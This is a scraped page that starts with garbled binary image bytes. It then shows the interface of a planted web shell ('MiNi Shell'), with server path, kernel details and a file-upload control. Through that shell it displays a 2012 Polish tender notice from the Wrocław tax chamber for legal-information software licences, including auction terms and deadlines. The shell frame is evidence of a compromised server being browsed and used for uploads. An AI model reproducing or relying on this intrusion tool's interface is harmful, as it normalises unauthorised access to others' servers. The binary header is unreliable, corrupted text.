JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20121224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20121224/526816-N-2012.html

<p class="kh_header"><b>Wrocław: Dostawa elektronicznego programu informacji prawnej wraz z aktualizacją oraz licencją na korzystanie z programu w systemie off-line, na stanowiskach mobilnych oraz on-line dla Izby Skarbowej we Wrocławiu oraz urzędów skarbowych woj. dolnośląskiego</b><br>
<b>Numer ogłoszenia: 526816 - 2012; data zamieszczenia: 24.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Skarbowa we Wrocławiu , ul. Pretficza 11, 50-983 Wrocław, woj. dolnośląskie, tel. 71 797 16 06, faks 71 797 16 17.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.is.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elektronicznego programu informacji prawnej wraz z aktualizacją oraz licencją na korzystanie z programu w systemie off-line, na stanowiskach mobilnych oraz on-line dla Izby Skarbowej we Wrocławiu oraz urzędów skarbowych woj. dolnośląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Dostawa elektronicznego programu informacji prawnej (zwanego dalej programem) wraz z aktualizacją oraz licencją na korzystanie z programu w systemie off-line, na stanowiskach mobilnych oraz on-line dla Izby Skarbowej we Wrocławiu oraz urzędów skarbowych woj. dolnośląskiego zwanych dalej Jednostkami Skarbowymi - według Zbiorczego zestawienia stanowiącego Załącznik nr 1 do umowy dostępnego na stronie Zamawiającego www.is.wroc.pl 
2. Ilość jednoczesnych dostępów /stanowisk:
a) dostęp off-line - dla 719 użytkowników
b) dostęp on-line - dla 400 użytkowników 
c) dostęp na stanowiskach mobilnych - 76 stanowisk 
d) dostęp on - line do danych z KRS - dla 583 użytkowników.

3. Baza elektronicznego programu informacji prawnej musi co najmniej zawierać:
a) Krajowe akty prawne
- Komplet obowiązujących aktualnie aktów prawnych ogłoszonych w Dzienniku Ustaw/Monitorze Polskim oraz aktów prawnych oczekujących na wejście w życie, także w wersji ujednoliconej. 
- Dzienniki Ustaw - roczniki z kompletem tekstów aktów prawnych od 1918r. ujednoliconych i ocenionych co do obowiązywania, z opisem zawierającym: identyfikator (miejsce publikacji, rok, numer, pozycja), tytuł i rodzaj aktu, autora, datę wydania, datę wejścia w życie oraz utratę mocy obowiązującej (jeśli miała miejsce), informacje o statusie (obowiązujący, archiwalny/oczekujący) 
- Monitory Polskie - roczniki z kompletem tekstów aktów prawnych od 1930r. ujednoliconych i ocenionych co do obowiązywania, z opisem zawierającym: identyfikator (miejsce publikacji, rok, numer, pozycja), tytuł i rodzaj aktu, autora, datę wydania, datę wejścia w życie oraz utratę mocy obowiązującej (jeśli miała miejsce), informacje o statusie (obowiązujący, archiwalny/oczekujący)
- Dzienniki Resortowe (Dzienniki Urzędowe Ministrów i Urzędów Centralnych) - zawierające teksty (aktów normatywnych, uchwał, orzeczeń, ogłoszeń) ujednolicony i ocenione co do obowiązywania, z opisem zawierającym: identyfikator, tytuł i rodzaj aktu/dokumentu, autora, datę wydania, datę wejścia w życie oraz utratę mocy obowiązującej (jeśli miała miejsce), informacje o statusie (obowiązujący, archiwalny/oczekujący), w szczególności Dziennik Urzędowy Ministra Finansów,
- Projekty ustaw z uzasadnieniem rządowym

b) Prawo europejskie
- Komplet obowiązujących na dzień 1 maja 2004 r. i aktualnie aktów prawnych Unii Europejskiej (traktaty, rozporządzenia i dyrektywy) ogłoszonych w Dzienniku Urzędowym Unii Europejskiej serii L i C oraz oczekujące na wejście w życie, także w wersji ujednoliconej (w polskiej wersji językowej),
- Dzienniki Urzędowe Unii Europejskiej serii L i C (wydanie polskie) - roczniki z kompletem tekstów aktów prawnych co najmniej od 1 maja 2004 r. ujednolicone, w polskiej wersji językowej i ocenione co do obowiązywania, z opisem zawierającym: identyfikator, tytuł i rodzaj aktu/dokumentu, autora, datę wydania, datę wejścia w życie oraz utratę mocy obowiązującej (jeśli miała miejsce), informacje o statusie (obowiązujący, archiwalny/oczekujący),
- Specjalne polskie wydanie Dzienników Urzędowych Unii Europejskiej zawierających akty prawa unijnego opublikowane przed dniem 1 maja 2004 r.  ocenione co do obowiązywania, z opisem zawierającym: identyfikator, tytuł i rodzaj aktu/dokumentu, autora, datę wydania, datę wejścia w życie oraz utratę mocy obowiązującej (jeśli miała miejsce), informacje o statusie (obowiązujący, archiwalny/oczekujący)
c) Krajowy Rejestr Sądowy
- aktualna baza podmiotów i dane z Monitora Sądowego i Gospodarczego, Monitora Polski B
d) Orzecznictwo
- administracyjne w tym m.in. sądów administracyjnych (w szczególności w zakresie prawa podatkowego), Urzędu Zamówień Publicznych, Głównej Komisji Orzekającej, Samorządowych Kolegiów Odwoławczych, Regionalnych Izb Obrachunkowych,
- sądów powszechnych, Sądu Najwyższego, Trybunału Konstytucyjnego,
- Trybunału Sprawiedliwości Unii Europejskiej (dawniej Europejskiego Trybunału Sprawiedliwości) - orzecznictwo luksemburskie,
e) Literatura prawa
- Komentarze w szczególności dotyczące: prawa podatkowego (m.in. ustawy Ordynacja podatkowa, ustaw podatkowych, ustawy o opłacie skarbowej), prawa administracyjnego (m.in. Kodeksu postępowania administracyjnego, egzekucji w administracji), prawa cywilnego (m.in. Kodeks cywilny), postępowania cywilnego, prawa pracy, prawa karnego, Kodeksu Karno Skarbowego, Kodeksu Spółek Handlowych, postępowania karnego, prawa zamówień publicznych, prawa europejskiego (m.in. w zakresie dyrektyw podatkowych), służby cywilnej, dostępu do informacji publicznej,
- monografie i inne opracowania dotyczące prawa polskiego (w szczególności podatkowego) i europejskiego,
- piśmiennictwo w szczególności dotyczące spraw podatkowych i egzekucji w administracji
f) Wzory pism i umów
4. Aktualizacja programu (dostęp off-line) będzie następowała w ten sposób, że w okresie obowiązywania umowy, minimum raz w miesiącu, w terminie do dnia 15-go danego miesiąca, Wykonawca dostarczy do siedziby Zamawiającego, nośniki zawierające aktualizację programu, uwzględniającą w szczególności akty prawne, komentarze i orzecznictwo, których data publikacji nie przekracza jednego miesiąca licząc wstecz od dnia dokonania przez Wykonawcę ostatniej aktualizacji. Dopuszcza się również aktualizację zawartości programu na serwerze poprzez łączenie z innym serwerem Wykonawcy (w tym przypadku nie jest konieczne dostarczanie nośników aktualizujących). Bez względu na realizację aktualizacji programu na serwerze (dostęp off-line) w zakresie stanowisk mobilnych Wykonawca zapewnia dostawę nośników z aktualizacją dla lokalizacji wskazanych w Załączniku nr 1 do umowy. W zakresie stanowisk mobilnych dostawa nośników nastąpi w ww. okresie i terminach, po 1 szt. dla lokalizacji wskazanych w Załączniku nr 1 do umowy , zgodnie z warunkami określonymi w umowie. W przypadku dostępu on-line oraz dostępu on-line do danych KRS, Wykonawca zobowiązuje się do bieżącej aktualizacji. 
5. Wykonawca będzie sprawował nadzór nad programem.
6. Wykonawca przeprowadzi niezbędne szkolenie dla pracowników w lokalizacjach wskazanych w Załączniku nr 1 do umowy oraz terminach uzgodnionych wcześniej z Jednostkami Skarbowymi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie pobierał wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (o treści jak w Załączniku nr 2 do ogłoszenia dostępnego na stronie Zamawiającego www.is.wroc.pl.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (o treści jak w Załączniku nr 2 do ogłoszenia dostępnego na stronie Zamawiającego www.is.wroc.pl.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (o treści jak w Załączniku nr 2 do ogłoszenia dostępnego na stronie Zamawiającego www.is.wroc.pl.)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (o treści jak w Załączniku nr 2 do ogłoszenia dostępnego na stronie Zamawiającego www.is.wroc.pl.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (o treści jak w Załączniku nr 2 do ogłoszenia dostępnego na stronie Zamawiającego www.is.wroc.pl.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wniosek o dopuszczenie do udziału w licytacji elektronicznej (wg wzoru stanowiącego Załącznik nr 2 do ogłoszenia dostępnego na stronie Zamawiającego www.is.wroc.pl.). 2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) muszą ustanowić i wskazać pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Z treści pełnomocnictwa musi wynikać, do której z w/w czynności powołano pełnomocnika i jakiego postępowania ono dotyczy. Pełnomocnictwo musi identyfikować Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika.
Wspólny wniosek powinien zawierać oświadczenia i dokumenty opisane w pkt III.4.2 dla każdego Wykonawcy z osobna</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany umowy i warunki zmian określono w ogólnych warunkach umowy stanowiących Załącznik nr 3 do ogłoszenia dostępnych na stronie Zamawiającego www.is.wroc.pl</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl/index.php</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.is.wroc.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wykonawcy chcący wziąć udział w przedmiotowej licytacji są zobowiązani do dokonania uprzedniej rejestracji na platformie do prowadzenia licytacji elektronicznych, zwanej dalej platformą, zamieszczonej na stronie https://licytacje.uzp.gov.pl/index.php, o ile nie są jeszcze zarejestrowani (nie jest wymagany podpis elektroniczny). Powyższej rejestracji Wykonawca powinien dokonać przed wysłaniem wniosku o dopuszczenie do udziału w licytacji.  Wraz z ww. wnioskiem Wykonawca zobowiązany jest przesłać Zamawiającemu informację o swoim loginie. Login Wykonawca otrzyma po zarejestrowaniu się na ww. platformie. W przypadku podania przez Wykonawcę niewłaściwego loginu, bądź nieprzekazania go Zamawiającemu wraz z wnioskiem, Wykonawca zobowiązany jest do jego przekazania najpóźniej jeden dzień przed terminem otwarcia licytacji. Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie. Wymagania techniczne urządzeń informatycznych, umożliwiających sprawne korzystanie z niniejszego systemu: Komputer PC z systemem operacyjnym Windows/Linux oraz przeglądarka internetowa Internet Explorer 6.0 lub wyższa lub Mozilla Firefox 2.0 lub wyższa. Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania ofert wszystkich Wykonawców, którzy spełnią warunki udziału w postępowaniu. Zaproszenie zostanie wysłane drogą elektroniczną na adres e-mail wskazany we wniosku o dopuszczenie do udziału w licytacji elektronicznej.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> Po zalogowaniu się Wykonawcy uzyskują dostęp do aplikacji umożliwiającej składanie ofert. Zamawiający ustalił cenę wywoławczą na kwotę 243 708,04 zł brutto. Zamawiający określił minimalną wysokość postąpienia na 5 000,00 zł brutto. System nie przyjmie postąpienia, którego wysokość jest mniejsza od określonego minimalnego postąpienia. Wysokość postąpienia jest liczona w odniesieniu do najkorzystniejszej oferty złożonej w danej licytacji. System dopuszcza składanie postąpień z dokładnością do jednego grosza (grosze należy oddzielić kropką). Od momentu otwarcia licytacji do jej zamknięcia Wykonawcy składają kolejne, korzystniejsze postąpienia w postaci elektronicznej, które podlegają automatycznej klasyfikacji na podstawie ceny. System umożliwia składanie wyłącznie ofert o cenie niższej niż oferta wiodąca w danym momencie. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. Wykonawca nie może cofnąć raz złożonej oferty. Użytkownicy ponoszą odpowiedzialność za informacje wprowadzone do systemu i konsekwencje z tego wynikające. W trakcie licytacji elektronicznej system na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, oraz cenach złożonych przez nich ofert, z tym że do momentu zamknięcia licytacji elektronicznej nie ujawnia się informacji umożliwiających identyfikację Wykonawców. W toku licytacji Wykonawcy proponują cenę oferty brutto wyrażoną w złotych. Zaproponowana cena obejmuje wszystkie koszty i składniki związane z wykonaniem zamówienia oraz warunkami stawianymi przez Zamawiającego, w tym koszty dostawy serwera do wskazanych pomieszczeń w siedzibie Zamawiającego oraz należny podatek VAT. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy wypełni Zbiorcze zestawienie stanowiące załącznik nr 1 do umowy (dostępne na stronie Zamawiającego www.is.wroc.pl) poprzez wpisanie do niego cen dla poszczególnych Jednostek Skarbowych i wartości całego przedmiotu umowy (brutto). Wypełnione i podpisane Zbiorcze zestawienie stanowić będzie załącznik nr 1 do umowy w sprawie zamówienia publicznego. Wartość przedmiotu umowy, która zostanie wykazana w Zbiorczym zestawieniu musi będzie tożsama z ceną najkorzystniejszej oferty tego Wykonawcy. Zaproponowana przez niego cena będzie stała w czasie objętym umową. Zapłata nastąpi zgodnie z ogólnymi warunkami umowy - Załącznik nr 3 do ogłoszenia dostępny na stronie Zamawiającego www.is.wroc.pl.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 60 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 02.01.2013 godzina 10:00, miejsce: Izba Skarbowa we Wrocławiu, ul. B. Pretficza 11, 50-983 Wrocław, pokój nr 307 (kancelaria).</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Licytacja zostanie otwarta w dniu 08.01.2013r. o godzinie 10.00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja zostanie zamknięta 08.01.2013r. o godzinie 11.00</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie będzie pobierał zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Ogólne warunki umowy stanowią załącznik nr 3 do ogłoszenia umieszczonego na stronie internetowej Zamawiającego www.is.wroc.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest zamówieniem wspólnym Izby Skarbowej we Wrocławiu i 23 urzędów skarbowych woj. dolnosląskiego. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający oraz Wykonawcy przekazują drogą elektroniczną lub faksem, dopuszczalna jest również forma pisemna. Wniosek musi być podpisany przez Wykonawcę lub upoważnionego przedstawiciela Wykonawcy, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) - przez pełnomocnika.
 Upoważnienie lub pełnomocnictwo winno być przedstawione w formie oryginału lub kopii poświadczonej notarialnie lub przez mocodawcę -za zgodność z oryginałem. Wniosek musi być sporządzony na formularzu wg wzoru stanowiącego Załącznik nr 2 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego: www.is.wroc.pl. Do Wniosku muszą być załączone wszystkie dokumenty, oświadczenia oraz załączniki wymagane w ogłoszeniu. We wszystkich miejscach, gdzie jest mowa o pieczątkach, Zamawiający dopuszcza złożenie czytelnego zapisu o treści pieczęci zawierającego co najmniej oznaczenie nazwy firmy i siedziby a w przypadku pieczęci imiennej - imię i nazwisko.
Wniosek umieszcza się w trwale zamkniętej kopercie, zaadresowanej do Zamawiającego, na której należy umieścić: nazwę i adres Zamawiającego, nazwę i adres Wykonawcy, hasło:
WNIOSEK O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI ELEKTRONICZNEJ SO-2511-0003-12 na dostawę elektronicznego programu informacji prawnej wraz z aktualizacją oraz licencją na korzystanie z programu w systemie off-line, na stanowiskach mobilnych oraz on-line dla Izby Skarbowej we Wrocławiu oraz urzędów skarbowych woj. dolnośląskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com